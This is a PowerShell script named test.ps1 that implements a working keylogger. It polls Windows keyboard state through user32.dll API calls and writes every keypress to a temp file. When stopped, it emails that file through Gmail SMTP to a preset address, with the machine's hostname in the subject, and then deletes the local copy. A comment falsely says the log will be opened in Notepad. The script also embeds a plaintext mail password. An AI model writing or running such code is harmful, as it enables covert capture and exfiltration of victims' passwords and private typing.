test.ps1

1. # Edit only this section!
2. $TimeToRun = 2
3. $From = "[email protected]"
4. $Pass = "SVa3y4rs"
5. $To = "[email protected]"
6. $Subject = "Keylogger Results"
7. $body = "Keylogger Results"
8. $SMTPServer = "smtp.mail.com"
9. $SMTPPort = "587"
10. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
11.  
12. $SMTPServer = 'smtp.gmail.com'
13. $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
14. $SMTPInfo.EnableSsl = $true
15. $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('[email protected]', 'SVa3y4rs')
16. $ReportEmail = New-Object System.Net.Mail.MailMessage
17. $ReportEmail.From = '[email protected]'
18. $ReportEmail.To.Add('[email protected]')
19. $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
20. ############################
21.  
22. #requires -Version 2
23. function Start-KeyLogger($Path = "$env:temp\keylogger.txt") {
24. <#
25. .DESCRIPTION
26. By accessing the Windows low-level API functions, a script can constantly
27. monitor the keyboard for keypresses and log these to a file. This effectively produces a keylogger.
28. Run the function Start-Keylogger to start logging key presses. Once you
29. stop the script by pressing CTRL+C, the collected key presses are displayed
30. .NOTES
31. http://powershell.com/cs/blogs/tips/archive/2015/12/09/creating-simple-keylogger.aspx
32. #>
33. # Signatures for API Calls
34. $signatures = @'
35. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
36. public static extern short GetAsyncKeyState(int virtualKeyCode);
37. [DllImport("user32.dll", CharSet=CharSet.Auto)]
38. public static extern int GetKeyboardState(byte[] keystate);
39. [DllImport("user32.dll", CharSet=CharSet.Auto)]
40. public static extern int MapVirtualKey(uint uCode, int uMapType);
41. [DllImport("user32.dll", CharSet=CharSet.Auto)]
42. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
43. '@
44.  
45. # load signatures and make members available
46. $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
47.  
48. # create output file
49. $null = New-Item -Path $Path -ItemType File -Force
50.  
51. try {
52. Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
53.  
54. # create endless loop. When user presses CTRL+C, finally-block
55. # executes and shows the collected key presses
56. while ($true) {
57. Start-Sleep -Milliseconds 40
58.  
59. # scan all ASCII codes above 8
60. for ($ascii = 9; $ascii -le 254; $ascii++) {
61. # get current key state
62. $state = $API::GetAsyncKeyState($ascii)
63.  
64. # is key pressed?
65. if ($state -eq -32767) {
66. $null = [console]::CapsLock
67.  
68. # translate scan code to real code
69. $virtualKey = $API::MapVirtualKey($ascii, 3)
70.  
71. # get keyboard state for virtual keys
72. $kbstate = New-Object -TypeName Byte[] -ArgumentList 256
73. $checkkbstate = $API::GetKeyboardState($kbstate)
74.  
75. # prepare a StringBuilder to receive input key
76. $mychar = New-Object -TypeName System.Text.StringBuilder
77.  
78. # translate virtual key
79. $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
80.  
81. if ($success) {
82. # add key to logger file
83. [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
84. }
85. }
86. }
87. }
88. }
89. finally
90. {
91. # open logger file in Notepad
92. $ReportEmail.Attachments.Add("$ENV:temp\keylogger.txt");$SMTPInfo.Send($ReportEmail)
93. Remove-Item -Path $Path -force
94. exit 1
95. }
96. }
97.  
98. # records all key presses until script is aborted by pressing CTRL+C
99. # will then open the file with collected key codes
100. Start-KeyLogger